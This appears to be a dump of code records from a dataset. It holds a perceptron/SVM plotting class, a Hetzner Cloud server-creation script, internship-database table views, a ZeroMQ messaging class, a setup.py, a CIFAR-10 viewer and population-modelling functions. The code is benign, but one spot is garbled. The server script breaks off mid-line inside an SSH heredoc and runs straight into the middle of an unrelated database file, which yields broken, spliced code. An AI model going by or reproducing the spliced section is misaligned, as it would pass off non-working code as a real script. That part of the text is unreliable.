with the bias\r\n added to each elemnt.\r\n\r\n param X - (DataFrame) Input data\r\n\r\n return z - the result of X.Weights + bias\r\n '''\r\n\r\n def net_input(self, X):\r\n \"\"\"Calculate net input\"\"\"\r\n # return the return the dot product: X.w + bias\r\n\r\n\r\n try:\r\n z = X.dot(self.weights[1:]) + self.weights[0]\r\n except:\r\n z = np.array([0 for x in self.features])\r\n\r\n return z\r\n\r\n '''\r\n Author: Christer Karlsson\r\n Given a Matrix X of vectors, ceates a temp vector the size of the amount \r\n of vectors. For each vector in Matrix X, if the vector's values represent a pass,\r\n the corrosponding index in the temp vector is set to 1. Else it is set to \r\n -1. The temp vector is then returned.\r\n\r\n param X - (DataFrame) Input data\r\n\r\n return - Vector of length of X with 1's and -1's\r\n '''\r\n\r\n def predict(self, X):\r\n \"\"\"Return class label after unit step\"\"\"\r\n return np.where(self.net_input(X) >= 0.0, 1, -1)\r\n\r\n '''\r\n Author: Christer Karlsson\r\n This function will plot the input data X and color the differing types different\r\n colors. A line will be drawn across the graph where the perceptron classifies each\r\n element as a pass or fail. Passes are in the red highlighted area and fails are in the\r\n blue highlighted area\r\n\r\n Added small change to remove error. when calling plt.scatter, the color needs to be an np\r\n array.\r\n\r\n param X - (DataFrame) Input data\r\n param y - (DataFrame) Training Set\r\n param resolution - (float) resolution on graph\r\n\r\n return void\r\n '''\r\n\r\n def plot_decision_regions(self, X, y, resolution=0.02):\r\n # setup marker generator and color map\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n # plot the decision surface\r\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n np.arange(x2_min, x2_max, resolution))\r\n Z = self.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n Z = Z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n # plot class samples\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],\r\n alpha=0.8, c=np.array([cmap(idx)]),\r\n marker=markers[idx], label=cl)\r\n\r\n plt.show()","sub_path":"HardSVM.py","file_name":"HardSVM.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"462822798","text":"#! /usr/bin/python3\n#\n# hcloud_py/make_machine.py -- a rewrite of hcloud_tf/make_machine.sh without using terraform.\n# (C) 2020 jw@owncloud.com -- distribute under GPLv2 or ask.\n#\n# We want to make the HCLOUD_SSHKEY_NAMES varible obsolete.\n# This can be done by checking $HOME/.ssh/ for existing private/public key pairs.\n# The public key of an existing pair could then be added to the newly created machine.\n# This technique is more reliably (and less cumbersome) than uploading and naming correct keys \n# with HCLOUD_SSHKEY_NAMES. Hcloud maintains keys per project. You need to re-upload when switching projects.\n#\n# With terraform, we support an aditional HCLOUD_SSHKEY variable, where such a private key can be \n# specified. Its use is however discouraged, and cannot reliably be automated, as terraform fails, if we specfy a key\n# that was already uploaded. Also with terraform there is no way to inspect uploaded keys and avoid sich conflicts.\n\n# See also:\n# https://github.com/hetznercloud/hcloud-python/tree/master/examples\n#\n# Requires:\n# sudo -H pip3 install hcloud\n#\nimport os, sys, string, random, base64, hashlib, argparse, subprocess\n\nfrom hcloud import Client\nfrom hcloud.images.domain import Image\nfrom hcloud.ssh_keys.domain import SSHKey\nfrom hcloud.server_types.domain import ServerType\n\nhcloud_api_token = os.environ.get('HCLOUD_TOKEN')\nif hcloud_api_token == None:\n print(\"Environment variable HCLOUD_TOKEN not set.\", file=sys.stderr)\n sys.exit(1)\nssh_key_names = os.environ.get('HCLOUD_SSHKEY_NAMES', '')\nserver_image = \"ubuntu-20.04\"\ndatacenter = \"fsn1-dc14\"\nserver_type = \"cx21\"\ndebug = False\n\nparser = argparse.ArgumentParser(description=sys.argv[0]+\" V0.1\")\nparser.add_argument('-i', '--image', type=str, default=server_image, help=\"server image. Default: \"+server_image)\nparser.add_argument('-t', '--type', type=str, default=server_type, help=\"server type. Default: \"+server_type)\nparser.add_argument('-d', '--datacenter', type=str, default=datacenter, help=\"server datacenter. Default: \"+datacenter)\nparser.add_argument('-s', '--ssh-key-names', type=str, help=\"comma-separated names of uploaded public keys. Default: env HCLOUD_SSHKEY_NAMES\", default=ssh_key_names)\nparser.add_argument('-p', '--packages', type=str, help=\"comma-separated list of linux packages to install\")\nparser.add_argument('-u', '--unique', action='store_true', help=\"make name unique by prepending user and appending a suffix\")\nparser.add_argument('-l', '--login', action='store_true', help=\"ssh into the machine, when ready\")\nparser.add_argument('MACHINE_NAME', nargs='?', help=\"optional machine name\")\nargs = parser.parse_args()\nNAME = args.MACHINE_NAME\nif not NAME: NAME = args.image\nNAME = NAME.translate( { ord('.'):ord('-'), ord('_'):ord('-') } ) # avoid _ and . in name. Always\n\nclient = Client(token=hcloud_api_token)\n\nif debug:\n # list all servers in this project\n for s in client.servers.get_all(): \n sd = s.data_model\n print(\"%-12s\" % sd.name, \"%-15s\" % sd.public_net.ipv4.ip if sd.public_net else None, sd.server_type.data_model.name, sd.image.name if sd.image else None, sd.created, sd.status, sd.labels, file=sys.stderr)\n \n # list all ssh-keys in this project\n for k in client.ssh_keys.get_all(): \n kd = k.data_model\n print(kd.fingerprint, kd.created, kd.name, kd.labels, file=sys.stderr)\n\nssh_key_names = args.ssh_key_names.split(',') if len(args.ssh_key_names) else []\npackages = args.packages.split(',') if args.packages else []\n\n# from http://stackoverflow.com/questions/6682815/deriving-an-ssh-fingerprint-from-a-public-key-in-python\ndef ssh_fingerprint(str):\n key = base64.b64decode(str.encode('ascii'))\n fp_plain = hashlib.md5(key).hexdigest()\n return ':'.join(a+b for a,b in zip(fp_plain[::2], fp_plain[1::2]))\n\nsshdir = os.environ.get('HOME')+'/.ssh/'\nif not ssh_key_names:\n # match local keys with hcloud keys\n for file in [ 'id_ed25519', 'id_ecdsa', 'id_dsa', 'id_rsa' ]:\n if os.access(sshdir+file+'.pub', 0) and os.access(sshdir+file, 0):\n pub = open(sshdir+file+'.pub', 'r').read().split()\n fp = ssh_fingerprint(pub[1])\n known_key = client.ssh_keys.get_by_fingerprint(fp)\n if known_key:\n ssh_key_names.append(known_key.data_model.name)\n print(\"hcloud ssh-key '%s' matches '%s.pub'\" % (known_key.data_model.name, sshdir+file), file=sys.stderr)\n break\n\nssh_pub_key = None\nif not ssh_key_names:\n # grab a key from the local home. It cannot cause collisions\n for file in [ 'id_ed25519', 'id_ecdsa', 'id_dsa', 'id_rsa' ]:\n if os.access(sshdir+file+'.pub', 0) and os.access(sshdir+file, 0):\n ssh_pub_key = open(sshdir+file+'.pub', 'r').read().split()\n if len(ssh_pub_key) < 3:\n ssh_pub_key.append(os.environ.get('USER'))\n break\n\nif not ssh_key_names and not ssh_pub_key:\n print(\"ERROR: env variable HCLOUD_SSHKEY_NAMES was empty, and could not find a key pair in ~/.ssh/\", file=sys.stderr)\n sys.exit(1)\n\nuser = ssh_key_names[0] if ssh_key_names else ssh_pub_key[2] # get user from key name, from local pubkey suffix, or from $USER\nuser = user.split('@')[0] # strip domain part, if any\nsuff = ''.join(random.choice(string.ascii_lowercase+string.digits) for i in range(5))\nif args.unique: NAME = '-'.join([user, NAME, suff])\n\nlabels = { 'owner': user, 'origin': 'make_machine.py' }\nssh_key_list = []\nfor k in ssh_key_names:\n bk = client.ssh_keys.get_by_name(k)\n if not bk:\n print(\"ERROR: key name '%s' is not kowwn at hcloud\" % k, file=sys.stderr)\n sys.exit(1)\n ssh_key_list.append(client.ssh_keys.get_by_name(k))\nif ssh_pub_key:\n k = client.ssh_keys.create(name=ssh_pub_key[2], public_key=ssh_pub_key[0]+' '+ssh_pub_key[1])\n ssh_key_list.append(k)\n\nif debug: print(NAME, args.type, args.image, args.datacenter, ssh_key_names, ssh_pub_key, ssh_key_list, packages, file=sys.stderr)\nresponse = client.servers.create(name=NAME, server_type=ServerType(args.type), image=Image(args.image), ssh_keys=ssh_key_list, labels=labels)\nserver = response.server\nIPADDR = server.data_model.public_net.ipv4.ip\nprint(\"Machine created: %s\" % IPADDR, file=sys.stderr)\n\nserver.change_dns_ptr(IPADDR, NAME+'.hcloud.owncloud.com') # needs an FQDN\n\n# CAUTION: keep in sync with ../hcloud_tf/make_machine.sh\nscript = \"\"\"\nexec 1>&2\t# all output goes to stderr.\nserver_image=\"%s\"\nIPADDR=\"%s\"\nextra_pkg=\"%s\"\ndo_login=\"%s\"\n\nssh-keygen -f ~/.ssh/known_hosts -R $IPADDR\t# needed to make life easier later.\n# StrictHostKeyChecking=no automatically adds new host keys and accepts changed host keys.\n\nfor i in 1 2 3 4 5 6 7 8 last; do\n sleep 5\n echo -n .\n ssh -o ConnectTimeout=5 -o CheckHostIP=no -o StrictHostKeyChecking=no -o PasswordAuthentication=no root@$IPADDR uptime && break\n if [ $i = last ]; then\n echo \"Error: cannot ssh into machine at $IPADDR -- tried multiple times.\"\n exit 1\n fi\ndone\n\nif [ -n \"$extra_pkg\" ]; then\n case \"$server_image\" in\n ubuntu*|debian*)\n ssh root@$IPADDR sh -x -s < 0:\n table = BeautifulTable()\n table.column_headers = [\"ID\", \"NAME\", \"COMPANAY\", \"YEAR\",\"STATUS\"]\n for l in lst:\n status = \"Comleted\" if l.status == 0 else \"Going on\" \n table.append_row([l.id, l.iname, l.company, l.i_year,status])\n print(table)\n else:\n print(f\"There are no Intership programms, yet to add...\")\n\ndef _view_student_list(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"USN\", \"NAME\", \"SEM\", \"PLACED\"]\n for l in lst:\n status = \"Placed\" if l.placed == 1 else \"Not placed\" \n table.append_row([l.usn, l.name, l.sem, l.placed])\n print(table)\n else:\n print(f\"There are no Students , yet to add...\")\n\n\ndef _view_registered_list(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"Internship ID\", \"USN\", \"STATUS\"]\n for l in lst:\n status = \"Not completed\" if l.status == 0 else \"Completed\" \n table.append_row([l.iid, l.usn, l.status])\n print(table)\n else:\n print(f\"There are no Students registered for any internship!\")\n\ndef _view_company_count(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"Company\", \"Count\"]\n for l in lst:\n table.append_row([l.company, l.count])\n print(table)\n else:\n print(f\"There are no company taken internship!\")\n\ndef _view_student_count(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"USN\", \"NAME\",\"COUNT\"]\n for l in lst:\n table.append_row([l.usn, l.name,l.count])\n print(table)\n else:\n print(f\"No student joined any internship!\")\n\ndef _view_student_report(lst):\n if lst and len(lst) > 0:\n table = BeautifulTable()\n table.column_headers = [\"USN\", \"NAME\",\"INTERNSHIP NAME\",\"COMPANY\",\"YEAR\"]\n for l in lst:\n table.append_row([l.usn, l.name,l.iname,l.company,l.i_year])\n print(table)\n else:\n print(f\"No internship conducted yet!\") ","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":9106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563153344","text":"import sys\nimport zmq\nimport logging\nimport json\n\n\n\nclass module(object):\n\n\n def __init__(self, mod_name, config):\n\n self.context = zmq.Context()\n self.config = config\n logging.basicConfig(format='%(asctime)s %(message)s', filename='log/module.log', level=logging.INFO)\n\n\n self.name = mod_name\n self.identity = self.config[mod_name]['identity']\n self.url = self.config[mod_name]['url']\n self.socket = self.context.socket(zmq.DEALER)\n self.establish_connection()\n\n\n self.poller = zmq.Poller()\n self.poller.register(self.socket, zmq.POLLIN)\n\n\n def establish_connection(self):\n\n self.socket.connect(self.url)\n self.sysout('established connection')\n\n\n def send(self, MESSAGE):\n\n self.socket.send_multipart(MESSAGE)\n self.sysout('send message', MESSAGE)\n\n\n def receive(self):\n\n MESSAGE = self.socket.recv_multipart()\n self.sysout('receive message', MESSAGE)\n\n return MESSAGE\n\n\n def create_message(self, TO = 'X', CORE = \"no input\"):\n\n if type(TO) is str:\n FROM = [self.identity]\n CORE_json = json.dumps(CORE)\n CORE_bytes = [CORE_json.encode('ascii')]\n ADDRESS = []\n TO = [self.config[TO]['identity']]\n\n elif type(TO) is list:\n MESSAGE_received = TO\n FROM = [self.identity]\n CORE_json = json.dumps(CORE)\n CORE_bytes = [CORE_json.encode('ascii')]\n MESSAGE_received.pop()\n TO = [MESSAGE_received.pop()]\n MESSAGE_received.pop()\n ADDRESS = MESSAGE_received\n\n MESSAGE = ADDRESS + TO + FROM + CORE_bytes\n return MESSAGE\n\n\n def extract_core(self, MESSAGE):\n CORE = MESSAGE[-1]\n CORE_json = CORE.decode('ascii')\n CORE_pyobj = json.loads(CORE_json)\n return CORE_pyobj\n\n\n def sysout(self, action, meta=False):\n\n sys.stdout.write('\\n'+'<> {} #'.format(self.name)+str(action)+'\\n'+'['+str(self.socket)+']'+'\\n'+'{}'.format(str(meta)+'\\n' if meta else '')+''+'\\n')\n\n\n sys.stdout.flush()\n\n\n logging.info('\\n<> {} #{}\\n [{}]\\n {}\\n'.format(self.name, str(action), str(self.socket), str(meta) if meta else ''))\n\n\n def destroy(self):\n self.socket.close()\n self.context.destroy()\n","sub_path":"DATABASE_EXTERN/DATABASE/Adds/remote_maintenance/structure/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"592139527","text":"#!/usr/bin/env python\nfrom setuptools import setup\n\nwith open(\"requirements.txt\") as requirement_file:\n requirements = requirement_file.readlines()\n\nsetup(\n name='keras2tensorflow',\n version='1.0.0',\n description='General code to convert a trained keras model into an inference tensorflow model',\n # author='',\n # author_email='',\n # url='',\n packages=[''],\n entry_points={\n 'console_scripts': [\n 'keras2tensorflow = keras_to_tensorflow:main'\n ]\n },\n install_requires=requirements,\n classifiers=[\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n 'Topic :: Utilities',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3'\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"124578736","text":"##########################################\n# randomShowImage.py\n# matplotlibを用いてcifar10から画像をランダム選択\n##########################################\n\nfrom keras.datasets import cifar10\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n#5*5枚の画像を表示する\nplt.figure(figsize=(10,10))\nfor i in range(25):\n #np.random.randint(): 0を起点とした50000の数字から整数を一つ生成\n rand_num = np.random.randint(0,50000)\n #plt.subplot(): 縦横5*5のフォーマットでi+1の地点に画像配置\n cifar_img = plt.subplot(5,5,i+1)\n plt.imshow(x_train[rand_num])\n #x軸の目盛りを消す\n plt.tick_params(labelbottom='off')\n #y軸の目盛りを消す\n plt.tick_params(labelleft='off')\n #正解ラベルを表示\n plt.title(y_train[rand_num])\nplt.show()\n\n#各ラベル\n#0 - airplane\n#1 - automobile\n#2 - bird\n#3 - cat\n#4 - deer\n#5 - dog\n#6 - frog\n#7 - horse\n#8 - ship\n#9 - truck","sub_path":"python/keras/cifar10/randomshow.py","file_name":"randomshow.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"599525580","text":"import ray\nfrom numpy import *\nfrom scipy.stats import poisson\nfrom scipy.integrate import odeint, solve_ivp\n######################Pmum#######################\nfrom scipy.special import gamma as Gamma\ndef Di(tlife, n, g): return tlife * power(g,-(n - 1)) + (n - 1)*(g - 1) + 1 \n\ndef P(mu, n, d, g, tlife): return (2*mu**d/Gamma(d + 1))*g**(n - 1)*((Di(tlife, n, g) - 1.5)**d - ( (n - 1)*(g - 1) + 1 - 1.5)**d)\n\ndef cPmum(gamma, s, mu, tlife, n): return P(mu, n, 1. / s / (gamma-1.), gamma, tlife)\n \ndef Pmum(gamma, s, mu, tlife, n): return P(mu, n, ceil(1. / s / (gamma-1.)), gamma, tlife)\n#################################################\n\n######################Q##########################\nscalar_type = float64\nint_type = int64\n\nzero = scalar_type(0)\none = scalar_type(1)\ntwo = scalar_type(2)\n\ndef one_m_exp_m(x): return x if x<1e-10 else one-exp(-x)\n\ndef gamma_sx(gamma,s,mc,x):\n return gamma / max(( 1 - s*(mc-x) * (gamma-1) ),finfo(scalar_type).tiny*1e6)\n #return (gamma * (gamma-1) / x)\ndef Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk):\n if s_scheme == \"scd\":\n gamma_s = array([nan]+[ gamma_sx(gamma,s,mc,x) for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n elif s_scheme == \"neutral\":\n gamma_s = array([nan]+[ gamma for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n else:\n gamma_s = array([nan]+[ (gamma - 2*s*(mc-x) * (gamma-1) ) / ( 1 - s*(mc-x) * (gamma-1) ) for x in range(1,mc+1) ], dtype=scalar_type) #m = mc-x\n #gamma_s = [None] + gamma_s\n\n tcorr=tlife\n #def W(x,k): return None if x==0 else power(gamma,k-n)*( one - s*(mc-x) * (gamma-one) )*tcorr/Nk[k]\n def W(x,k): return None if x==0 else power(gamma,k-n)*gamma_sx(gamma,s,mc,x)*tcorr/Nk[k]\n \n Q = array( [ [scalar_type(0.0) for k in range(n+1)] for x in range(mc+1) ], dtype=scalar_type )\n Q[:,n] = 0\n Q[0,:] = 1\n for x in range(1,mc+1):\n for k in range(0,n)[::-1]:\n Q[x, k] = one_m_exp_m( ( \n mu * (gamma_s[x]-two) * Q[x-1,k ] +\n mu * gamma_s[x] * Q[x-1,k+1] +\n gamma_s[x] * Q[x ,k+1] \n ) * one_m_exp_m(W(x,k)) )\n return Q\n\ndef PQ(gamma, tlife, s, mu, n, s_scheme=\"neutral\", Nk = ones(0), rng = random.default_rng()):\n if Nk.size==0:\n Nk=ones(n)\n \n mc = int(ceil( 1. / s / (gamma-1.) ))\n\n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n \n lambda0 = power( gamma, one-n ) * mu * tlife\n \n Pc = poisson.sf(mc-1,double(lambda0))\n\n Cm = array([poisson.sf(m,double(lambda0)) for m in range(mc)]) / mu\n\n Mm = array([ Cm[0] + poisson.pmf(0,double(lambda0)) - one if m==0 else Cm[m] + poisson.pmf(m,double(lambda0)) for m in range(mc)])\n\n Qm = array([ Q[mc-m,1] for m in range(mc) ])\n \n return two*Pc + sum( Mm * Qm ) + sum( Nk[1:n]*Q[mc,1:n] )\n\ndef iMQ_ivp_times(gamma, tlife, s, mu, n, times, s_scheme=\"scd\", Nk = ones(0)):\n if Nk.size==0:\n Nk=ones(n)\n\n mc = int(ceil( 1. / s / (gamma-1.) ))\n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n \n p0 = zeros(mc+1)\n p0[0] = one\n \n t = zero\n pi = zero\n\n def dpdt(t,p,gamma,s,mc,n):\n Q = Qs(gamma, s, mc, t, mu, n, s_scheme, Nk)\n r = power( gamma, one-n )\n # d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n d = zeros(mc, dtype=scalar_type)\n di = zeros(mc, dtype=scalar_type)\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[mc-1] += r * mu\n dp = zeros(p.size)\n dp[:mc] = -d * p[:mc]\n dp[1:mc] += d[:mc-1] * p[:mc-1]\n dp[mc] = sum(p[:mc] * di)\n return dp\n \n p = solve_ivp(dpdt,[0,tlife],p0,args=(gamma,s,mc,n),t_eval=times,method=\"Radau\")\n return p.y[-1] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_ivp(gamma, tlife, s, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n mc = int(ceil( 1. / s / (gamma-1.) ))\n return iMQ_ivp_mc(gamma, tlife, s, mc, mu, n, s_scheme)\n\ndef iMQ_ivp_mc(gamma, tlife, s, mc, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n if Nk.size==0:\n Nk=ones(n)\n\n \n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n di = zeros(mc, dtype=scalar_type)\n \n r = power( gamma, one-n )\n# d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n d = zeros(mc, dtype=scalar_type)\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[mc-1] += r * mu\n \n p0 = zeros(mc+1)\n p0[0] = one\n \n t = zero\n pi = zero\n\n def dpdt(t,p,d,di):\n dp = zeros(p.size)\n dp[:mc] = -d * p[:mc]\n dp[1:mc] += d[:mc-1] * p[:mc-1]\n dp[mc] = sum(p[:mc] * di)\n return dp\n \n p = solve_ivp(dpdt,[0,tlife],p0,args=(d,di),method=\"Radau\")\n return p.y[-1][-1] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_odeint(gamma, tlife, s, mu, n, s_scheme=\"scd\", Nk = ones(0)):\n if Nk.size==0:\n Nk=ones(n)\n\n mc = int(ceil( 1. / s / (gamma-1.) ))\n \n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n di = zeros(mc, dtype=scalar_type)\n \n r = power( gamma, one-n )\n# d_m = r*( mu + mu * Q[mc-m-1,1] + (1-mu) * Q[mc-m,1] )\n d = zeros(mc, dtype=scalar_type)\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[mc-1] += r * mu\n \n p0 = zeros(mc+1)\n p0[0] = one\n \n t = zero\n pi = zero\n\n def dpdt(p,t,d,di):\n dp = zeros(p.size)\n dp[:mc] = -d * p[:mc]\n dp[1:mc] += d[:mc-1] * p[:mc-1]\n dp[mc] = sum(p[:mc] * di)\n return dp\n \n p = odeint(dpdt,p0,[0,tlife],args=(d,di))\n return p[1][mc] + sum(Nk * Q[mc,1:])\n\n\ndef iMQ_euler(gamma, tlife, s, mu, n, s_scheme=\"scd\", delta=1., Nk = ones(0)):\n if Nk.size==0:\n Nk=ones(n)\n\n mc = int(ceil( 1. / s / (gamma-1.) ))\n \n Q = Qs(gamma, s, mc, tlife, mu, n, s_scheme, Nk)\n di = zeros(mc, dtype=scalar_type)\n \n r = power( gamma, one-n )\n d = zeros(mc, dtype=scalar_type)\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n for m in range(mc):\n d[m] = r * ( mu + mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[m] = r * ( mu * Q[mc-m-1,1] + (one-mu) * Q[mc-m,1] )\n di[mc-1] += r * mu\n \n p=zeros(mc)\n dp=zeros(mc)\n p[0]=one\n delta_t=delta*one/r\n \n t=zero\n pi=zero\n while t abs(d[i]-d[j]):\n #print(i,j,d[i],d[j],d[i]-d[j])\n d[i]+= (1.-rng.random())*epsilon*min(d[i],d[j])\n d[j]+= (1.-rng.random())*epsilon*min(d[i],d[j])\n #print(i,j,d[i],d[j],d[i]-d[j])\n\n# C_m = r*(r*mu)^m * sum_{i=0}^{m} (1-exp(-d_i*t))/d_i / prod_{j=0,j!=i}^{m} (d_j-d_i)\n C = zeros(mc+1, dtype=scalar_type)\n for m in range(mc):\n positive_Cs=[]\n negative_Cs=[]\n prods=[]\n for i in range(m+1):\n prod = one\n for j in range(m+1):\n if i!=j:\n #print(r * mu * Q[mc-j-1,1] , r * mu * Q[mc-i-1,1] , r * (one-mu) * Q[mc-j,1] , r * (one-mu) * Q[mc-i,1],r * mu * Q[mc-j-1,1] - r * mu * Q[mc-i-1,1] + r * (one-mu) * Q[mc-j,1] - r * (one-mu) * Q[mc-i,1])\n prod *= d[j]- d[i] #- one #r * mu * Q[mc-j-1,1] - r * mu * Q[mc-i-1,1] + r * (one-mu) * Q[mc-j,1] - r * (one-mu) * Q[mc-i,1]\n #if prod!=1:\n # prod *= power(d[i],m-1)\n C_term = r * power( r * mu , m ) * one_m_exp_m(d[i]*tlife) / d[i] / prod \n prods+=[prod]\n if C_term>0:\n positive_Cs+=[C_term]\n else:\n negative_Cs+=[C_term]\n \n #print(one_m_exp_m(d[i]*tlife),d[i],prod, r * power( r * mu , m ) * one_m_exp_m(d[i]*tlife) / d[i] / prod)\n Csum = 0\n negative_Cs = sorted(negative_Cs)\n positive_Cs = sorted(positive_Cs)[::-1]\n# print(negative_Cs)\n# print(positive_Cs)\n# print(r * power( r * mu , m )*tlife/array(prods))\n Cs=[]\n for i in range(max(len(positive_Cs),len(negative_Cs))):\n Cs+=[0]\n if i tlife:\n return PT0(mc)\n \n if rates[\"scd\"][k] > rng.random() * rates[\"R\"][k]:\n PA = PT(t, k, n, rates, tlife, mc, poi, rng) \n PB = PT(t, k, n, rates, tlife, mc, poi, rng)\n else:\n PA = PT(t, k+1, n, rates, tlife, mc, poi, rng) \n PB = PT(t, k+1, n, rates, tlife, mc, poi, rng)\n PAp = zeros(mc+1)\n PBp = zeros(mc+1)\n return merge(PA, PB, poi, mc)\n\ndef PT0_flat(t,rates, n, tlife, mc, poi,rng):\n PAs=[]\n while t < tlife:\n PA=PT(t, 0, n, rates, tlife, mc, poi, rng) \n PAs+=[PA]\n t += rng.exponential(1./rates[\"scdd\"][0])\n PAB = PT0(mc)\n for PA in PAs:\n PAB = merge(PA, PAB, poi, mc)\n return PAB[mc] #eq. 5\n\n#truncated PT0_flat\ndef PT0_flat_K(t,rates,tlife, mc, poi, K=100):\n if K>int(tlife*rates[\"scdd\"][0]):\n K=int(ceil(tlife*rates[\"scdd\"][0]))\n Krange=range(K)\n PAs=[PT(t, 0, rates, tlife, mc, poi) for i in Krange]\n PAB = PT0(mc)\n while t < tlife:\n PAB = merge(PAs[random.choice(Krange)], PAB, poi, mc)\n t += rng.exponential(1./rates[\"scdd\"][0])\n return PAB[mc]#eq. 5\n\ndef T(gamma, n, tlife, Nk, s, mu, F=PT0_flat, rng=random.default_rng()):#rates and precalc.\n\n mc = int(ceil( 1. / s / (gamma-1.) ))\n \n poi = array([ poisson.pmf(m, mu) for m in range(mc+2)])\n \n delta = array([power( gamma, 1 - (n-k) ) for k in range(n)])\n \n p = 1 # for now ..\n q = 2./gamma\n rates={}\n rates[\"scd\"] = array([0 if k==0 or k==n else 0.5 * delta[k] / Nk[k] * (1-q) for k in range(n) ])\n rates[\"scdd\"]= array([ delta[k] / Nk[k] if k==0 else 0.5 * delta[k] / Nk[k] for k in range(n) ])\n rates[\"R\"] = rates[\"scd\"] + rates[\"scdd\"]\n \n return F(0,rates,n,tlife,mc,poi,rng)\n#################################################\n\n#################ray#############################\n#utility functions for ray\n@ray.remote\ndef PTray(t,k,rates,tlife,mc,poi):\n return PT(t,k,rates,tlife,mc,poi)\n@ray.remote\ndef Tray(gamma, n, tlife, Nk, s, mu):\n return T(gamma, n, tlife, Nk, s, mu, PT0_flat_K)\n\n#per progenitor subtree parallelization of PT0_flat\ndef PT0_flat_ray(t,rates,tlife, mc, poi):\n PAs=[]\n while t < tlife:\n PA=PTray.remote(t, 0, rates, tlife, mc, poi) \n PAs+=[PA]\n t += rng.exponential(1./rates[\"scdd\"][0])\n PAs = ray.get(PAs)\n PAB = PT0(mc)\n for PA in PAs:\n PAB = merge(PA, PAB, poi, mc)\n return PAB[mc]#eq. 5\n\n#truncated per progenitor subtree parallelization of PT0_flat\ndef PT0_flat_ray_K(t,rates,tlife, mc, poi, K=100):\n Krange=range(K)\n PAs=ray.get([PTray.remote(t, 0, rates, tlife, mc, poi) for i in Krange])\n PAB = PT0(mc)\n while t < tlife:\n PAB = merge(PAs[random.choice(Krange)], PAB, poi, mc)\n t += rng.exponential(1./rates[\"scdd\"][0])\n return PAB[mc]#eq. 5\n\n#################################################\n\n","sub_path":"Heatmaps_FIG_S2_S3_ipynb_reproduce/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"252246220","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/muntjac/demo/sampler/features/layouts/ExpandingComponentExample.py\n# Compiled at: 2013-04-04 15:36:38\nfrom muntjac.api import VerticalLayout, HorizontalLayout, Button\n\nclass ExpandingComponentExample(VerticalLayout):\n\n def __init__(self):\n 